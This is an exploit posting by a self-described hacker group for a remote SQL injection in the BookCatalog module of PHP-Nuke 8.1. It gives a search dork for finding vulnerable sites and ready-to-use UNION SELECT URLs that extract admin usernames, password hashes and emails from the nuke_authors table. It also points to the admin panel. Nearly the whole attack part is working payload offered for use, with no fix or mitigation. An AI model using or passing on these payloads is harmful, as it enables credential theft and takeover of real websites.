############################### IRANIAN THE BEST HACKERS IN THE WORLD ################## #################### #################### ## ## Remote SQL injection Vulnerability ## ## PHP-Nuke 8.1 Module BookCatalog (category&catid) ## ############################################################### ############################################################### ############################################################### ############################################################### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.only-4dl.tk ## ## Email : Ehsan_Hp200@xxxxxxxxxxx ## ## Persian Gulf 4 Ever! ############################# ############################# ############################# ############################# ############################# ############################# ## ## Dork : "inurl:modules.php?name=BookCatalog" Exploite for username: www.victim.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,aid+from+nuke_authors-- Exploite for password: www.victim.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,pwd+from+nuke_authors-- Exploite for E-mail: www.victim.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,email+from+nuke_authors-- ############################################################################### Admin Panel: www.victim.com/admin.php ,############################################################################## special tanks to : All Parsi Hacker security Team members,SAHAND SHABAN , Dj7xpl , ONLY3250 , Jasoos Team ,Enigma2 ,####################################################################################################### ############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################